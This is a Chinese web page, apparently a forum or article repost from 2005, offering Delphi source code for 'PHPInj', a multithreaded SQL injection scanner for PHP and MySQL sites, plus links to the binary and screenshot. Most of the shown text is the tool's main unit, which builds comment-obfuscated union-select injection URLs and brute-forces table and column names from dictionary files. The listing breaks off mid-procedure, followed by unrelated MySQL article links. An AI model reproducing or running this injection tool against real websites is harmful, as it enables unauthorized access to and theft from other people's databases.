简介:PHP+MYSQL网站注入扫描工具,针对类似夜猫文章下 载系统比较有效,界面是仿教程的hdsi中的PHP注入模块写 的,实现原理是参考angel的SQL Injection with MYSQL 写的,网上有很多,不再细说。 界面截图:http://www.wrsky.com/attachment/3_1891.jpg 源码下载:http://downloads.2ccc.com/general/internet_lan/PHPInj.rar
Author: hnxyy QQ: 19026695 Date: 2005/5/25
FireFox技术交流论坛 http://www.wrsky.com It is all beginnings free It is all ruin to be privately owned 使用D7编写,界面比较难看,和教主的工具对比了一下,感觉比他的工作扫描速度要快很多
主要单元代码:
unit Unit1;
interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Spin, StdCtrls, ComCtrls, Buttons, ExtCtrls, IDHTTP, unit2, Unit3, OleCtrls, SHDocVw;
type TForm1 = class(TForm) Panel8: TPanel; Label15: TLabel; Label16: TLabel; Label17: TLabel; EdtInjUrl: TEdit; EdtKey: TEdit; EdtFieldNum: TEdit; rdbNum: TRadioButton; rdbChar: TRadioButton; Panel1: TPanel; pcPHPInj: TPageControl; TabSheet1: TTabSheet; sbscan1: TSpeedButton; sbstop1: TSpeedButton; sbscan2: TSpeedButton; sbstop2: TSpeedButton; Panel15: TPanel; GroupBox5: TGroupBox; lvTable: TListView; GroupBox6: TGroupBox; lvField: TListView; TabSheet2: TTabSheet; GroupBox7: TGroupBox; Label18: TLabel; Label19: TLabel; Label20: TLabel; Label21: TLabel; spField1: TSpinEdit; spField2: TSpinEdit; EdtField1: TEdit; EdtField2: TEdit; EdtTable: TEdit; EdtID: TEdit; GroupBox8: TGroupBox; Label22: TLabel; EdtFileName: TEdit; sbrecord: TSpeedButton; sbfile: TSpeedButton; MM: TMemo; sbscan: TSpeedButton; TabSheet3: TTabSheet; lsbDict: TListBox; TabSheet4: TTabSheet; wb: TWebBrowser; spNum: TSpinEdit; GroupBox1: TGroupBox; sbscan3: TSpeedButton; sbstop3: TSpeedButton; ListBox1: TListBox; TabSheet5: TTabSheet; MMAbout: TMemo; StatusBar1: TStatusBar; procedure sbscanClick(Sender: TObject); procedure sbstop1Click(Sender: TObject); procedure sbscan1Click(Sender: TObject); procedure sbscan2Click(Sender: TObject); procedure lvFieldClick(Sender: TObject); procedure lvTableClick(Sender: TObject); procedure sbrecordClick(Sender: TObject); procedure sbfileClick(Sender: TObject); procedure sbstop2Click(Sender: TObject); procedure sbscan3Click(Sender: TObject); procedure sbstop3Click(Sender: TObject); procedure ListBox1Click(Sender: TObject); procedure FormShow(Sender: TObject); private { Private declarations } Url,KeyWord:string; iStr,InjUrl:string; //弹出信息框 procedure MsgBox(strMsg: string); procedure SetUrl; function Get(URL,Key: string): boolean; procedure InjTable; procedure FieldThreadExit(sender: TObject); procedure ManagerThreadExit(sender: TObject); public { Public declarations } pg1:TProgressBar; end;
var Form1: TForm1; //scanTable :array of scanTableThread; // 定义线程数组 scanField :array of scanFieldThread; scanManager :array of scanManagerThread; scanTable: scanTableThread; //扫描表段线程 isFinish:boolean=false;
N:integer=0; M:integer=0;
implementation
{$R *.dfm}
{ TForm1 }
procedure TForm1.MsgBox(strMsg: string); begin Application.MessageBox(pchar(strMsg), ''''提示信息'''', mb_iconinformation); end;
procedure TForm1.SetUrl; begin begin if rdbNum.Checked then Url := trim(EdtInjUrl.Text) else Url := trim(EdtInjUrl.Text)+#39; end; end;
procedure TForm1.sbscanClick(Sender: TObject); var scan:scanThread; begin if (EdtInjUrl.Text='''''''') then begin MsgBox(''''请输入要注入的地址!''''); exit; end; if (EdtKey.Text='''''''') then begin MsgBox(''''请输入要注入的关键字!''''); exit; end; SetUrl; KeyWord:=trim(EdtKey.Text); pg1.Visible :=False; //scan :=scanThread.Create(Url,KeyWord,MM); scan :=scanThread.Create(False); end;
function TForm1.Get(URL,Key: string): boolean; var IDHTTP: TIDHttp; ss: String; begin Result:= False; IDHTTP:= TIDHTTP.Create(nil); try try idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错 idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问 ss:= IDHTTP.Get(URL); if Key='''''''' then begin if IDHTTP.ResponseCode=200 then Result :=true; end else begin if (IDHTTP.ResponseCode=200) and (pos(Key,ss)>0) then Result :=true; end; except end; finally IDHTTP.Free; end; end;
procedure TForm1.sbstop1Click(Sender: TObject); begin stoped :=True; pg1.Visible :=False; end;
//不使用线程 procedure TForm1.InjTable; var i,j:integer; begin if (iStr='''''''') or (KeyWord='''''''') then exit; lsbDict.Items.Clear; lvTable.Items.Clear; lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt''''); j:=0; isFinish :=False; Screen.Cursor :=crHourGlass; try for i:=0 to lsbDict.Count-1 do begin if isFinish then break; InjUrl:=Url+''''/**/and/**/1=1/**/union/**/select/**/''''+iStr+ ''''/**/from/**/''''+lsbDict.Items+''''/*'''';
MM.Lines.Add(InjUrl); if Get(InjUrl,KeyWord) then begin inc(j); with lvTable.Items.Add do begin Caption :=IntToStr(j); SubItems.Add(lsbDict.Items); end; end; end; finally Screen.Cursor :=crDefault; end; end;
procedure TForm1.sbscan1Click(Sender: TObject); var i:integer; begin if (strtoint(EdtFieldNum.Text)<=0) or (KeyWord='''''''') then exit; lsbDict.Items.Clear; lvTable.Items.Clear; N :=0; lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt''''); isFinish :=False; for i:=1 to strtoint(EdtFieldNum.Text) do iStr:=iStr+'''',''''+IntToStr(i); iStr :=copy(iStr,2,length(iStr)-1); //在一个线程内完成表段猜解工作 scanTable :=scanTableThread.Create(Url,iStr,KeyWord,MM,lvTable); end;
procedure TForm1.sbscan2Click(Sender: TObject); var i,j,Sum:integer; tablename:string; begin if lvTable.Items.Count<=0 then exit; if lvTable.SelCount<=0 then begin MsgBox(''''请选择一个表名!''''); exit; end; tablename :=trim(lvTable.Selected.SubItems.GetText); if tablename='''''''' then exit;
if isFinish=False then begin lsbDict.Items.Clear; lvField.Items.Clear; MM.Clear; N :=0; lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Field.txt''''); Sum :=lsbDict.Count; iStr :=''''''''; pg1.Min :=0; pg1.Max :=sum; pg1.Step :=1; pg1.Position :=0; pg1.Visible :=true; MM.Lines.Add(''''开始猜解字段。。。''''); MM.Lines.Add(''''''''); for i:=1 to strtoint(EdtFieldNum.Text) do begin if i=strtoint(spNum.Text) then iStr :=iStr+'''',&FIELDNAME&'''' else iStr :=iStr+'''',''''+inttostr(i); end; if iStr<>'''''''' then iStr :=copy(iStr,2,length(iStr)-1);
SetLength(scanField,Sum); // 动态设置线程的数量 //创建多个线程完成字段猜解 for j:=0 to Sum-1 do begin //if isFinish then exit; scanField[j] := scanFieldThread.Create(Url,iStr,KeyWord,tablename,j,MM,lvField); scanField[j].OnTerminate := FieldThreadExit; end; // sbscan2.Caption :=''''停止''''; end;
try if isFinish=true then begin //if N>=lsbDict.Count then exit; if sbscan2.Caption=''''停止'''' then begin for j:=N to lsbDict.Count-1 do begin if scanField[j].FreeOnTerminate then begin scanField[j].Suspend; scanField[j].Free; //scanField[j].Terminate; end; end; end; MM.Lines.Add(''''''''); MM.Lines.Add(''''字段猜解结束。。。''''); // sbscan2.Caption :=''''猜解''''; end; except end;
isFinish :=true; end;
procedure TForm1.Fiel [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> [MySql]PHP存取 Mysql 数据乱码终极解决方案 [MySql]解决Table xxx is marked as crashed and should … [MySql][MySQL]快速解决"is marked as crashed and shoul… [MySql]MySQL DELETE语法用法详解 [MySql]mysql中时间日期格式化 [MySql]修改mysql导入文件大小限制 [其他]MySql常用命令大全 [Web开发]把ACCESS的数据导入到Mysql中的方法详解 [MySql]解决mysql 1040错误Too many connections的方法 [系统软件]利用crontab系统每天定时备份MySQL数据库
|